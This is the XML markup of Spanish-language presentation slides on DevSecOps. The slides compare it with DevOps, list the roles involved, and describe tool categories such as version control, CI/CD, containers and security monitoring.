          <p:cNvPr id="53" name="CuadroTexto 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3239DBF5-01D7-ED5F-F891-0831E7558060}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8324842" y="3342129"/>
            <a:ext cx="3691558" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Control de seguridad (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Responsable de seguridad gestionada, consultor de ciberseguridad, consultor de desarrollo seguro, auditor de seguridad, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="CuadroTexto 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4A23A57-027D-ECE6-3ED1-C27314CAA392}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858465" y="1845922"/>
            <a:ext cx="5078354" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Control de calidad: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Responsable de control de calidad,  analista QA, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> QA, usuarios de la aplicación, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1942B7-10C7-0E96-4D09-63D2CB019D77}"/>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780895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45A50-E168-62EE-4B2F-7CF92435944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808D025-9968-3DBD-6F89-AFD47857D56B}"/>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7859FE9-1EC9-A39E-6CD7-53E3618210C2}"/>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el ciclo de vida DevOps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDD303CE-7742-7CF0-F031-DEA6525CEA5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41A3A712-3167-6250-379F-2D2D6D831A83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662710" y="1456930"/>
            <a:ext cx="9520447" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La incorporación de medidas de seguridad asegura la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>resistencia y seguridad de las aplicaciones frente a cualquier amenaza </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>desde el principio del proceso de desarrollo de software.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Tabla 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81967363-B78F-254D-9B84-CD4C028A241F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2209194208"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="741837" y="2418595"/>
          <a:ext cx="9365758" cy="3374819"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{69012ECD-51FC-41F1-AA8D-1B2483CD663E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4682879">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3928125907"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4682879">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2702451849"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="563599">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DevOps</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="004C41"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DevSecOps</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
                        <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="004C41"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="407069817"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="872210">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Colaboración y automatización</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> entre desarrollo y operaciones para mejorar la entrega de software</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnR w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Añade el concepto de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>seguridad </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>a la colaboración y automatización entre desarrollo y operaciones durante todo el proceso de desarrollo de software</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57024860"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="872210">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914398" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>El objetivo principal es </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>acelerar la entrega de software</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, mejorar la eficiencia y reducir los cuellos de botella en el ciclo de desarrollo</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398" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>El objetivo principal es garantizar que las </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>aplicaciones sean seguras </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>desde el principio y resistentes ante cualquier amenaza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46192111"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="872210">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>La </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>seguridad no ocupa un papel importante </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>en el desarrollo de software</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398" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>La </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>seguridad es parte integral y prioritaria </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>en el desarrollo de software</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68942026"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="Imagen 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40D2C698-5F1A-BC16-71BC-DD09F37E9A06}"/>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59592" y1="47245" x2="59592" y2="47245"/>
                        <a14:foregroundMark x1="40612" y1="59388" x2="40612" y2="59388"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1260761" flipH="1">
            <a:off x="9825869" y="4161148"/>
            <a:ext cx="1964135" cy="1964135"/>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4D6884EC-C0E8-2E11-8B35-23AA31816E57}"/>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740805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14EC4-7F5B-BEF4-EA97-964575675AE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A5FA2A2-C38D-C005-C98C-FC612131820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228EF96-7B11-A6CD-B47E-6B90DA6DD52A}"/>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Herramientas y técnicas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{039A618C-218F-C3D2-F2D4-A48F9D58E7C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5" name="Picture 18" descr="DevSecOps with Gitlab CI Course | AppSecEngineer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{912B446B-6541-C4A5-3CB8-C62368B59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134" y="3674732"/>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891B3123-BFA5-7932-36A3-F176B7E0979D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649313" y="1130809"/>
            <a:ext cx="3158771" cy="2298192"/>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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Control de versiones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Permite rastrear cambios en el código fuente, documentos y otros activos digitales a lo largo del tiempo. Facilita la colaboración en equipo </a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectángulo 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71ED7F79-AD9B-66C7-0E00-923879EC7416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649313" y="2757712"/>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1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="GitHub logo PNG transparent image download, size: 1150x465px">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{185DA3A0-F19A-78D5-B278-4D50E3D698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875" y="2727293"/>
            <a:ext cx="1861799" cy="7529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A5AEE90E-D16B-915F-5507-66C235036446}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6222391" y="3308658"/>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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Integración continua y despliegue continuo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Automatizan la construcción, prueba y despliegue de aplicaciones, permitiendo una entrega rápida y segura de software </a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectángulo 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F51FD093-92CE-BAEC-CCD4-EA6401C46F29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6222391" y="5093214"/>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1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED8262E1-4E5E-1F4E-E263-B6E0934070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184" y="5100667"/>
            <a:ext cx="2209184" cy="711031"/>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F151307A-4D02-FFAD-9AC3-A80E213E3931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2264470" y="3650647"/>
            <a:ext cx="3158771" cy="2231227"/>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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Contenedores y microservicios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Permiten la administración segura de contenedores y microservicios, incluyendo aspectos como el aislamiento </a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectángulo 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B1D00BB-A37D-46B1-8AB8-9EE7C2419512}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2264470" y="5176649"/>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1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE2BC6BE-35C9-BE95-4483-F516365C3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7134" y="5398215"/>
            <a:ext cx="1593254" cy="2819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Logotipo blanco de Docker apaisado PNG transparente - StickPNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64F55282-C5CC-0AD8-6465-EDD4814E9D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38" y="5354905"/>
            <a:ext cx="1348408" cy="3487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B95597E0-5EA6-8127-27FA-DE2E321B8F30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7156482" y="1193868"/>
            <a:ext cx="3158771" cy="1903305"/>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ES" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Monitoreo y detección</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Supervisan las actividades en tiempo real y alertan sobre actividades inusuales o maliciosas </a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectángulo 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26EBD69C-7707-9A91-D9C1-04EBC6ACA18A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7156482" y="2391948"/>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1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
